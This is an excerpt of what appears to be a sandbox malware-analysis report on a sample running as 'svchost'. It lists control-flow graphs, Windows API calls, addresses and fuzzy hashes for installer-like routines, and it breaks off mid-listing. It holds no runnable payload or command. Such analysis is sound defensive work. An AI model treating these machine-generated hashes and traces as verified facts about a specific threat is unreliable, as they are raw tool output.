                              • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B96
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: nsa
                              • API String ID: 1716503409-2209301699
                              • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                              • Instruction ID: 343f4ea9f9204f9b983ce224a42535e265f7560d01468737dbca66c928219fc6
                              • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                              • Instruction Fuzzy Hash: 59F0A7363082087BDB108F56DD04B9B7BADDF91750F10803BFA48DB290D6B4E9548B58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 147 406338-406352 GetModuleHandleA 148 406354-406355 call 4062ca 147->148 149 40635e-40636b GetProcAddress 147->149 152 40635a-40635c 148->152 151 40636f-406371 149->151 152->149 153 40636d 152->153 153->151
                              APIs
                              • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                              • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                              • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                              • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 154 405b39-405b65 GetFileAttributesA CreateFileA
                              APIs
                              • GetFileAttributesA.KERNELBASE(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: File$AttributesCreate
                              • String ID:
                              • API String ID: 415043291-0
                              • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                              • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                              • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                              • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 155 40560a-405618 CreateDirectoryA 156 40561a-40561c 155->156 157 40561e GetLastError 155->157 158 405624 156->158 157->158
                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,00436400,00436400,00436400,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                              • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                              • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                              • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 159 405bb1-405bcd ReadFile 160 405bd9 159->160 161 405bcf-405bd2 159->161 163 405bdb-405bdd 160->163 161->160 162 405bd4-405bd7 161->162 162->163
                              APIs
                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                              • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                              • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                              • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 164 4056bc-4056cf 165 4056d1-4056d4 164->165 166 4056d6-4056dd 164->166 165->166 167 40571d 165->167 168 4056e5-405717 MessageBoxIndirectA 166->168 169 4056df 166->169 168->167 169->168
                              APIs
                              • MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: IndirectMessage
                              • String ID:
                              • API String ID: 1874166685-0
                              • Opcode ID: a81150367e063ef0bdd0a9389b0422ac57d94b12222abdb6e03ac96fa31959c1
                              • Instruction ID: 967ea066bfc29e2aa6795bde397a922e1e324cb9cd7a9a175135763750586fc1
                              • Opcode Fuzzy Hash: a81150367e063ef0bdd0a9389b0422ac57d94b12222abdb6e03ac96fa31959c1
                              • Instruction Fuzzy Hash: BEF0D4756007009BC764DB58EA4861637E0F768318F90497ED049A23A0D7BA9896CF0E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 170 4036f4-4036fc 171 40370c-40371d call 403739 call 405768 170->171 172 4036fe-403705 FindCloseChangeNotification 170->172 172->171
                              APIs
                              • FindCloseChangeNotification.KERNELBASE(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 85548b19f8ec65ad1ecacc9011ccc847bf4f4f48fdb4e8669f1d7c125d31055c
                              • Instruction ID: fcdeae3644427ae1932c05eee93fd893892bcf305b30f8148603d437c2107f19
                              • Opcode Fuzzy Hash: 85548b19f8ec65ad1ecacc9011ccc847bf4f4f48fdb4e8669f1d7c125d31055c
                              • Instruction Fuzzy Hash: F0C012B0500701A6C5247F749E8F6053E556B41735F648735F0B4B60F1C77C4659956E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 193 404a44-404a90 GetDlgItem * 2 194 404cb0-404cb7 193->194 195 404a96-404b2a GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 193->195 196 404cb9-404cc9 194->196 197 404ccb 194->197 198 404b39-404b40 DeleteObject 195->198 199 404b2c-404b37 SendMessageA 195->199 200 404cce-404cd7 196->200 197->200 201 404b42-404b4a 198->201 199->198 202 404ce2-404ce8 200->202 203 404cd9-404cdc 200->203 204 404b73-404b77 201->204 205 404b4c-404b4f 201->205 209 404cf7-404cfe 202->209 210 404cea-404cf1 202->210 203->202 206 404dc6-404dcd 203->206 204->201 211 404b79-404ba5 call 40403f * 2 204->211 207 404b51 205->207 208 404b54-404b71 call 405fc2 SendMessageA * 2 205->208 212 404e3e-404e46 206->212 213 404dcf-404dd5 206->213 207->208 208->204 215 404d00-404d03 209->215 216 404d73-404d76 209->216 210->206 210->209 247 404bab-404bb1 211->247 248 404c6f-404c82 GetWindowLongA SetWindowLongA 211->248 222 404e50-404e57 212->222 223 404e48-404e4e SendMessageA 212->223 219 405026-405038 call 4040a6 213->219 220 404ddb-404de5 213->220 225 404d05-404d0c 215->225 226 404d0e-404d23 call 404992 215->226 216->206 221 404d78-404d82 216->221 220->219 228 404deb-404dfa SendMessageA 220->228 230 404d92-404d9c 221->230 231 404d84-404d90 SendMessageA 221->231 232 404e59-404e60 222->232 233 404e8b-404e92 222->233 223->222 225->216 225->226 226->216 244 404d25-404d36 226->244 228->219 239 404e00-404e11 SendMessageA 228->239 230->206 241 404d9e-404da8 230->241 231->230 242 404e62-404e63 ImageList_Destroy 232->242 243 404e69-404e70 232->243 237 404fe8-404fef 233->237 238 404e98-404ea4 call 4011ef 233->238 237->219 252 404ff1-404ff8 237->252 265 404eb4-404eb7 238->265 266 404ea6-404ea9 238->266 250 404e13-404e19 239->250 251 404e1b-404e1d 239->251 253 404db9-404dc3 241->253 254 404daa-404db7 241->254 242->243 245 404e72-404e73 GlobalFree 243->245 246 404e79-404e85 243->246 244->216 255 404d38-404d3a 244->255 245->246 246->233 256 404bb4-404bba 247->256 260 404c88-404c8c 248->260 250->251 258 404e1e-404e37 call 401299 SendMessageA 250->258 251->258 252->219 259 404ffa-405024 ShowWindow GetDlgItem ShowWindow 252->259 253->206 254->206 261 404d3c-404d43 255->261 262 404d4d 255->262 263 404c50-404c63 256->263 264 404bc0-404be8 256->264 258->212 259->219 268 404ca6-404cae call 404074 260->268 269 404c8e-404ca1 ShowWindow call 404074 260->269 271 404d45-404d47 261->271 272 404d49-404d4b 261->272 275 404d50-404d6c call 40117d 262->275 263->256 279 404c69-404c6d 263->279 273 404c22-404c24 264->273 274 404bea-404c20 SendMessageA 264->274 280 404ef8-404f1c call 4011ef 265->280 281 404eb9-404ed2 call 4012e2 call 401299 265->281 276 404eab 266->276 277 404eac-404eaf call 404a12 266->277 268->194 269->219 271->275 272->275 283 404c26-404c35 SendMessageA 273->283 284 404c37-404c4d SendMessageA 273->284 274->263 275->216 276->277 277->265 279->248 279->260 295 404f22 280->295 296 404fbe-404fd2 InvalidateRect 280->296 301 404ee2-404ef1 SendMessageA 281->301 302 404ed4-404eda 281->302 283->263 284->263 299 404f25-404f30 295->299 296->237 298 404fd4-404fe3 call 404965 call 40494d 296->298 298->237 303 404f32-404f41 299->303 304 404fa6-404fb8 299->304 301->280 305 404edc 302->305 306 404edd-404ee0 302->306 308 404f43-404f50 303->308 309 404f54-404f57 303->309 304->296 304->299 305->306 306->301 306->302 308->309 311 404f59-404f5c 309->311 312 404f5e-404f67 309->312 313 404f6c-404fa4 SendMessageA * 2 311->313 312->313 314 404f69 312->314 313->304 314->313
                              APIs
                              • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                              • GetDlgItem.USER32(?,00000408), ref: 00404A67
                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                              • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                              • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                              • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                              • DeleteObject.GDI32(00000000), ref: 00404B3A
                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                              • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                              • ShowWindow.USER32(?,00000005), ref: 00404C93
                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                              • ImageList_Destroy.COMCTL32(?), ref: 00404E63
                              • GlobalFree.KERNEL32(?), ref: 00404E73
                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                              • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                              • ShowWindow.USER32(?,00000000), ref: 00405012
                              • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                              • ShowWindow.USER32(00000000), ref: 00405024
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                              • String ID: $M$N
                              • API String ID: 1638840714-813528018
                              • Opcode ID: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
                              • Instruction ID: 8b31743f23cd8b0b58ed2b5f291beccc42c2d4f26c41c681c3135c74bfbc6718
                              • Opcode Fuzzy Hash: 9b14bfcce48d0d769f086a49a0ef55ef456572940aa0dac0a86a005e500a94a8
                              • Instruction Fuzzy Hash: 9D027FB0A00209AFEB20DF55DD85AAE7BB5FB84314F14413AF610B62E1C7799D52CF58
                              APIs
                              • DeleteFileA.KERNEL32(?,?,76193410,00436400,00000000), ref: 00405791
                              • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76193410,00436400,00000000), ref: 004057D9
                              • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76193410,00436400,00000000), ref: 004057FA
                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76193410,00436400,00000000), ref: 00405800
                              • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76193410,00436400,00000000), ref: 00405811
                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                              • FindClose.KERNEL32(00000000), ref: 004058CF
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 2035342205-1173974218
                              • Opcode ID: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                              • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                              • Opcode Fuzzy Hash: f32b864989338f25708692fe16fa07ece67d324431ed473f1cfad528f6b064ac
                              • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 315 405205-405221 316 4053b0-4053b6 315->316 317 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 315->317 318 4053e0-4053ec 316->318 319 4053b8-4053da GetDlgItem CreateThread CloseHandle 316->319 335 4052f0-40530a SendMessageA * 2 317->335 336 40530c-40530f 317->336 322 40540e-405414 318->322 323 4053ee-4053f4 318->323 319->318 327 405416-40541c 322->327 328 405469-40546c 322->328 325 4053f6-405409 ShowWindow * 2 call 404074 323->325 326 40542f-405436 call 4040a6 323->326 325->322 339 40543b-40543f 326->339 332 405442-405452 ShowWindow 327->332 333 40541e-40542a call 404018 327->333 328->326 330 40546e-405474 328->330 330->326 337 405476-405489 SendMessageA 330->337 340 405462-405464 call 404018 332->340 341 405454-40545d call 4050c7 332->341 333->326 335->336 343 405311-40531d SendMessageA 336->343 344 40531f-405336 call 40403f 336->344 345 405586-405588 337->345 346 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 337->346 340->328 341->340 343->344 354 405338-40534c ShowWindow 344->354 355 40536c-40538d GetDlgItem SendMessageA 344->355 345->339 352 4054d0-4054e6 TrackPopupMenu 346->352 353 4054bd-4054cd GetWindowRect 346->353 352->345 356 4054ec-405506 352->356 353->352 357 40535b 354->357 358 40534e-405359 ShowWindow 354->358 355->345 359 405393-4053ab SendMessageA * 2 355->359 360 40550b-405526 SendMessageA 356->360 361 405361-405367 call 404074 357->361 358->361 359->345 360->360 362 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 360->362 361->355 364 40554a-40556a SendMessageA 362->364 364->364 365 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 364->365 365->345
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 00405264
                              • GetDlgItem.USER32(?,000003EE), ref: 00405273
                              • GetClientRect.USER32(?,?), ref: 004052B0
                              • GetSystemMetrics.USER32(00000002), ref: 004052B7
                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                              • ShowWindow.USER32(?,00000008), ref: 00405353
                              • GetDlgItem.USER32(?,000003EC), ref: 00405374
                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                              • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                              • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                              • CreateThread.KERNEL32(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                              • CloseHandle.KERNEL32(00000000), ref: 004053DA
                              • ShowWindow.USER32(00000000), ref: 004053FD
                              • ShowWindow.USER32(?,00000008), ref: 00405404
                              • ShowWindow.USER32(00000008), ref: 0040544A
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                              • CreatePopupMenu.USER32 ref: 0040548F
                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                              • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                              • OpenClipboard.USER32(00000000), ref: 00405529
                              • EmptyClipboard.USER32 ref: 0040552F
                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                              • GlobalLock.KERNEL32(00000000), ref: 00405542
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                              • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                              • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                              • CloseClipboard.USER32 ref: 00405580
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                              • String ID:
                              • API String ID: 590372296-0
                              • Opcode ID: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
                              • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                              • Opcode Fuzzy Hash: e4850145c29fa6a118fc99cbce2f78c5114ccbb4892c913cd041fdaee94a6f36
                              • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 366 403b6b-403b7d 367 403b83-403b89 366->367 368 403cbe-403ccd 366->368 367->368 369 403b8f-403b98 367->369 370 403d1c-403d31 368->370 371 403ccf-403d17 GetDlgItem * 2 call 40403f SetClassLongA call 40140b 368->371 372 403b9a-403ba7 SetWindowPos 369->372 373 403bad-403bb0 369->373 375 403d71-403d76 call 40408b 370->375 376 403d33-403d36 370->376 371->370 372->373 378 403bb2-403bc4 ShowWindow 373->378 379 403bca-403bd0 373->379 385 403d7b-403d96 375->385 381 403d38-403d43 call 401389 376->381 382 403d69-403d6b 376->382 378->379 386 403bd2-403be7 DestroyWindow 379->386 387 403bec-403bef 379->387 381->382 397 403d45-403d64 SendMessageA 381->397 382->375 384 40400c 382->384 392 40400e-404015 384->392 390 403d98-403d9a call 40140b 385->390 391 403d9f-403da5 385->391 393 403fe9-403fef 386->393 395 403bf1-403bfd SetWindowLongA 387->395 396 403c02-403c08 387->396 390->391 400 403fca-403fe3 DestroyWindow EndDialog 391->400 401 403dab-403db6 391->401 393->384 399 403ff1-403ff7 393->399 395->392 402 403cab-403cb9 call 4040a6 396->402 403 403c0e-403c1f GetDlgItem 396->403 397->392 399->384 407 403ff9-404002 ShowWindow 399->407 400->393 401->400 408 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 401->408 402->392 404 403c21-403c38 SendMessageA IsWindowEnabled 403->404 405 403c3e-403c41 403->405 404->384 404->405 409 403c43-403c44 405->409 410 403c46-403c49 405->410 407->384 436 403e13-403e4f ShowWindow EnableWindow call 404061 EnableWindow 408->436 437 403e0b-403e10 408->437 413 403c74-403c79 call 404018 409->413 414 403c57-403c5c 410->414 415 403c4b-403c51 410->415 413->402 417 403c92-403ca5 SendMessageA 414->417 419 403c5e-403c64 414->419 415->417 418 403c53-403c55 415->418 417->402 418->413 422 403c66-403c6c call 40140b 419->422 423 403c7b-403c84 call 40140b 419->423 434 403c72 422->434 423->402 432 403c86-403c90 423->432 432->434 434->413 440 403e51-403e52 436->440 441 403e54 436->441 437->436 442 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 440->442 441->442 443 403e86-403e97 SendMessageA 442->443 444 403e99 442->444 445 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 443->445 444->445 445->385 456 403edf-403ee1 445->456 456->385 457 403ee7-403eeb 456->457 458 403f0a-403f1e DestroyWindow 457->458 459 403eed-403ef3 457->459 458->393 461 403f24-403f51 CreateDialogParamA 458->461 459->384 460 403ef9-403eff 459->460 460->385 462 403f05 460->462 461->393 463 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 461->463 462->384 463->384 468 403fb0-403fc8 ShowWindow call 40408b 463->468 468->393
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                              • ShowWindow.USER32(?), ref: 00403BC4
                              • DestroyWindow.USER32 ref: 00403BD8
                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                              • GetDlgItem.USER32(?,?), ref: 00403C15
                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                              • IsWindowEnabled.USER32(00000000), ref: 00403C30
                              • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                              • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                              • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                              • ShowWindow.USER32(00000000,?), ref: 00403E1A
                              • EnableWindow.USER32(?,?), ref: 00403E2C
                              • EnableWindow.USER32(?,?), ref: 00403E47
                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                              • EnableMenuItem.USER32(00000000), ref: 00403E64
                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                              • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EB9
                              • SetWindowTextA.USER32(?,0042A870), ref: 00403EC8
                              • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                              • String ID:
                              • API String ID: 184305955-0
                              • Opcode ID: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
                              • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                              • Opcode Fuzzy Hash: f28a66a0d7b9129856a2e3a49e044433d573e82c372ccead841a979cc75b8fa5
                              • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 471 4037ce-4037e6 call 406338 474 4037e8-4037f8 call 405efe 471->474 475 4037fa-40382b call 405e87 471->475 484 40384e-403877 call 403a93 call 405a26 474->484 480 403843-403849 lstrcatA 475->480 481 40382d-40383e call 405e87 475->481 480->484 481->480 489 40387d-403882 484->489 490 4038fe-403906 call 405a26 484->490 489->490 491 403884-4038a8 call 405e87 489->491 496 403914-403939 LoadImageA 490->496 497 403908-40390f call 405fc2 490->497 491->490 498 4038aa-4038ac 491->498 500 4039ba-4039c2 call 40140b 496->500 501 40393b-40396b RegisterClassA 496->501 497->496 502 4038bd-4038c9 lstrlenA 498->502 503 4038ae-4038bb call 405963 498->503 515 4039c4-4039c7 500->515 516 4039cc-4039d7 call 403a93 500->516 504 403971-4039b5 SystemParametersInfoA CreateWindowExA 501->504 505 403a89 501->505 509 4038f1-4038f9 call 405938 call 405fa0 502->509 510 4038cb-4038d9 lstrcmpiA 502->510 503->502 504->500 508 403a8b-403a92 505->508 509->490 510->509 514 4038db-4038e5 GetFileAttributesA 510->514 519 4038e7-4038e9 514->519 520 4038eb-4038ec call 40597f 514->520 515->508 524 403a60-403a68 call 405199 516->524 525 4039dd-4039f7 ShowWindow call 4062ca 516->525 519->509 519->520 520->509 530 403a82-403a84 call 40140b 524->530 531 403a6a-403a70 524->531 532 403a03-403a15 GetClassInfoA 525->532 533 4039f9-4039fe call 4062ca 525->533 530->505 531->515 534 403a76-403a7d call 40140b 531->534 537 403a17-403a27 GetClassInfoA RegisterClassA 532->537 538 403a2d-403a5e DialogBoxParamA call 40140b call 40371e 532->538 533->532 534->515 537->538 538->508
                              APIs
                                • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                              • lstrcatA.KERNEL32(00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,76193410,00436400,00435000,00000000), ref: 00403849
                              • lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,00436000,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,76193410), ref: 004038BE
                              • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
